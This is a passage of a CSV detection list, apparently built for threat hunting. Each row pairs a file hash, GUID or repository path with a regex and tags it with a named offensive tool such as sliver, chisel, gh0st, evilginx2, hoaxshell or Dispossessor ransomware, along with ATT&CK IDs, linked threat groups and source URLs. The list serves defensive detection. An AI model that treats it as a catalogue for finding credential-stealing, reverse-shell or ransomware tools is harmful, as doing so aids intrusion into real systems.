samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","29873"
"*80096ca34a483165ffbef283b6afa771d8a4883a2d231604f7638a682b8a44f2*",".{0,1000}80096ca34a483165ffbef283b6afa771d8a4883a2d231604f7638a682b8a44f2.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","29874"
"*8009852738404fcfead7a80baac530fe2a8633d4dcdc17cb9230fa69b026a72b*",".{0,1000}8009852738404fcfead7a80baac530fe2a8633d4dcdc17cb9230fa69b026a72b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29875"
"*8009a7f38189b6bdc8e8afca6fc2aa27ab1ca09525e36e3664de8436b78cf439*",".{0,1000}8009a7f38189b6bdc8e8afca6fc2aa27ab1ca09525e36e3664de8436b78cf439.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29876"
"*800ddc434bc8cd851417eba662314bbf37c893ee3e3ab715da5fb386c29103f0*",".{0,1000}800ddc434bc8cd851417eba662314bbf37c893ee3e3ab715da5fb386c29103f0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29877"
"*8011deee58ffff8edb641b0c964481a3f1e00978abc96904c1922d1ac88e243a*",".{0,1000}8011deee58ffff8edb641b0c964481a3f1e00978abc96904c1922d1ac88e243a.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","29878"
"*8019f095c7cf482767df31cd411cc53c4e30a23c599aa9381391326a6e7c6304*",".{0,1000}8019f095c7cf482767df31cd411cc53c4e30a23c599aa9381391326a6e7c6304.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29881"
"*801cf83159c4f8e926bbd62cce010fc436d5ed036f589b4269b866f6a3657bda*",".{0,1000}801cf83159c4f8e926bbd62cce010fc436d5ed036f589b4269b866f6a3657bda.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29883"
"*801e85a2cc2b8d16312799bd16dc5d05985f4f2577b2d7d90ba71bd35c8ba180*",".{0,1000}801e85a2cc2b8d16312799bd16dc5d05985f4f2577b2d7d90ba71bd35c8ba180.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29884"
"*80220edbb4afa4dde08d9f9ba2f980681769b7376f2bf42ef27a7487cfcb799d*",".{0,1000}80220edbb4afa4dde08d9f9ba2f980681769b7376f2bf42ef27a7487cfcb799d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29885"
"*80230cc6c13af45f3e6a03afdb2ec31b219893ee2da3ffd2da78317e807741d5*",".{0,1000}80230cc6c13af45f3e6a03afdb2ec31b219893ee2da3ffd2da78317e807741d5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29887"
"*8026261f-ac68-4ccf-97b2-3b55b7d6684d*",".{0,1000}8026261f\-ac68\-4ccf\-97b2\-3b55b7d6684d.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","29889"
"*802a7ba4f023cd272eba8de0488848a7667ac0eeb3844108bdca994491846404*",".{0,1000}802a7ba4f023cd272eba8de0488848a7667ac0eeb3844108bdca994491846404.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#filehash","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","29891"
"*802cc16a8b00b49fbc1685cdfa652fabe7b53d5d0e1fe1a1da4ab0da59ec263f*",".{0,1000}802cc16a8b00b49fbc1685cdfa652fabe7b53d5d0e1fe1a1da4ab0da59ec263f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29892"
"*80326cd79c767a6230f8b271ac764743b204d6c1af6cf7ac464ba5919f037e0d*",".{0,1000}80326cd79c767a6230f8b271ac764743b204d6c1af6cf7ac464ba5919f037e0d.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","29893"
"*8034c131c03f032538aac5c7619732804c64e7e619e4dc27614ecedfdbe2afd5*",".{0,1000}8034c131c03f032538aac5c7619732804c64e7e619e4dc27614ecedfdbe2afd5.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29895"
"*803c76c8edc3cb686137d642d75fcedd54b89461c719504f2e5f8a3235c3f7c3*",".{0,1000}803c76c8edc3cb686137d642d75fcedd54b89461c719504f2e5f8a3235c3f7c3.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#filehash","N/A","8","1","N/A","N/A","N/A","N/A","29896"
"*803fb03b9ae22f31ebb1db44628636c063311b3fab30626f9224dd954b7028a9*",".{0,1000}803fb03b9ae22f31ebb1db44628636c063311b3fab30626f9224dd954b7028a9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29897"
"*8045dd05e50f88b109a05dbd39d98aa7a0ca95d45f62d6aba817a5b257c366f7*",".{0,1000}8045dd05e50f88b109a05dbd39d98aa7a0ca95d45f62d6aba817a5b257c366f7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29899"
"*804E7688C41C080042845DEA6461DAE99DAB16204788E4BEE1C7476AD1280674*",".{0,1000}804E7688C41C080042845DEA6461DAE99DAB16204788E4BEE1C7476AD1280674.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#filehash","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","29900"
"*805d62d6cb854199c313f9724cf44a1ec63e8d35b9de235f529cd562fba6011d*",".{0,1000}805d62d6cb854199c313f9724cf44a1ec63e8d35b9de235f529cd562fba6011d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29903"
"*806ffe052652b8848d19fe26c63ecc35742077d87bbe04102b048a7c9c644c22*",".{0,1000}806ffe052652b8848d19fe26c63ecc35742077d87bbe04102b048a7c9c644c22.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","29909"
"*80736669542D3727C77CCDA1589F9D7C17568A1D97D98FFAE84AFBBBF081BE67*",".{0,1000}80736669542D3727C77CCDA1589F9D7C17568A1D97D98FFAE84AFBBBF081BE67.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29910"
"*80777fb99fdfa860d11e9701de35fe4addb56b66d3382ee514758d367610395a*",".{0,1000}80777fb99fdfa860d11e9701de35fe4addb56b66d3382ee514758d367610395a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","29911"
"*8077c66a6fbdc3a6c6a13628b2a5de8a21a366222cd38bed0c9d40901a01c792*",".{0,1000}8077c66a6fbdc3a6c6a13628b2a5de8a21a366222cd38bed0c9d40901a01c792.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29912"
"*80781550fa32f8a74539450563a7eac0a49ae8d226381e4b496c7c87250a9c0e*",".{0,1000}80781550fa32f8a74539450563a7eac0a49ae8d226381e4b496c7c87250a9c0e.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","29913"
"*808843c9419ba2e42881ef4f4ad3087874d3d7088d16fb6dbf6508f05a1189c8*",".{0,1000}808843c9419ba2e42881ef4f4ad3087874d3d7088d16fb6dbf6508f05a1189c8.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","29917"
"*80897c682d005f5382cd3da5121a2e394f293213848c7e0bc0747381481b142a*",".{0,1000}80897c682d005f5382cd3da5121a2e394f293213848c7e0bc0747381481b142a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29918"
"*808ae003016831e085d1d08f06b62fd7e9aa647224d0d21f8594b54f9c52b548*",".{0,1000}808ae003016831e085d1d08f06b62fd7e9aa647224d0d21f8594b54f9c52b548.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29919"
"*808Mak1r/GodzillaSource*",".{0,1000}808Mak1r\/GodzillaSource.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","29920"
"*8093f462616ec9e222eb6dac9abcff21a6dca3075283e7daca3d209e81cb85f6*",".{0,1000}8093f462616ec9e222eb6dac9abcff21a6dca3075283e7daca3d209e81cb85f6.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","29921"
"*8093f462616ec9e222eb6dac9abcff21a6dca3075283e7daca3d209e81cb85f6*",".{0,1000}8093f462616ec9e222eb6dac9abcff21a6dca3075283e7daca3d209e81cb85f6.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","29922"
"*8099c768d5898dccca1f09370e5b171c1a9b40d8558cbe08c8bbcc23763db00e*",".{0,1000}8099c768d5898dccca1f09370e5b171c1a9b40d8558cbe08c8bbcc23763db00e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29923"
"*809f540f580fc0e192a1c0432ec04105a3faf51f9d7c20f5e15423b78774052d*",".{0,1000}809f540f580fc0e192a1c0432ec04105a3faf51f9d7c20f5e15423b78774052d.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","29924"
"*80a9520b464f4bd7b4747c897a66a3c41a9100cb9efcd94614e2bd053247285a*",".{0,1000}80a9520b464f4bd7b4747c897a66a3c41a9100cb9efcd94614e2bd053247285a.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","29926"
"*80a9715cb597950d540961b82e1f6793af205d9de2de5e61e6b6e53fc45845b4*",".{0,1000}80a9715cb597950d540961b82e1f6793af205d9de2de5e61e6b6e53fc45845b4.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","29927"
"*80ABA1A7-0E3E-3DB2-8EB9-D4EE1C266504*",".{0,1000}80ABA1A7\-0E3E\-3DB2\-8EB9\-D4EE1C266504.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","#GUIDProject","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","29929"
"*80b564a22ac44bb773a8849e33b043617348eaac203be63f87d2bd0ec75f7f30*",".{0,1000}80b564a22ac44bb773a8849e33b043617348eaac203be63f87d2bd0ec75f7f30.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29932"
"*80BA63A4-7D41-40E9-A722-6DD58B28BF7E*",".{0,1000}80BA63A4\-7D41\-40E9\-A722\-6DD58B28BF7E.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","29934"
"*80bba5f788f3f4a7fa0e3a516fdd0dcd7eb1553065ee224090f18dec032a04cd*",".{0,1000}80bba5f788f3f4a7fa0e3a516fdd0dcd7eb1553065ee224090f18dec032a04cd.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","29935"
"*80be0f50a66761674611885cf41fc742eb8291db9885ff5a08d5867ae74eac7b*",".{0,1000}80be0f50a66761674611885cf41fc742eb8291db9885ff5a08d5867ae74eac7b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29936"
"*80d792752ea5235d98332ae1f26e897e7481f4d3c194b56d1a5bddbfaa043eb9*",".{0,1000}80d792752ea5235d98332ae1f26e897e7481f4d3c194b56d1a5bddbfaa043eb9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29942"
"*80e3f33e222040c459c76c14ab5aebc3d2069d29ff7baa32358a4813608eaaa2*",".{0,1000}80e3f33e222040c459c76c14ab5aebc3d2069d29ff7baa32358a4813608eaaa2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29943"
"*80e5d08cc3b73bf1c8e1b9ad7280936bb8d83f0a41f6fdd277e19511e3340cf6*",".{0,1000}80e5d08cc3b73bf1c8e1b9ad7280936bb8d83f0a41f6fdd277e19511e3340cf6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29944"
"*80ea8260d6148c716cf35ae8d8621a41b95cf4cd5857392698f1f21f62f2cb8e*",".{0,1000}80ea8260d6148c716cf35ae8d8621a41b95cf4cd5857392698f1f21f62f2cb8e.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","#filehash","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","29945"
"*80ed17895205205c5a769d18715cb74a623cee6a5379bb8142d2c8c533c759b2*",".{0,1000}80ed17895205205c5a769d18715cb74a623cee6a5379bb8142d2c8c533c759b2.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","#filehash","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","29946"
"*80f32d3706de3583f3228e9dd2d53375868308bfba3add3ae2637adba6fa392b*",".{0,1000}80f32d3706de3583f3228e9dd2d53375868308bfba3add3ae2637adba6fa392b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29947"
"*80f45afbf7b1c8a0f84fded941cec8979c27d86faea7275c0c70daab760c2908*",".{0,1000}80f45afbf7b1c8a0f84fded941cec8979c27d86faea7275c0c70daab760c2908.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29948"
"*80f8454777e31fe469f71f99f2df69a00f79cbbb42699d00587133516eb90546*",".{0,1000}80f8454777e31fe469f71f99f2df69a00f79cbbb42699d00587133516eb90546.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29950"
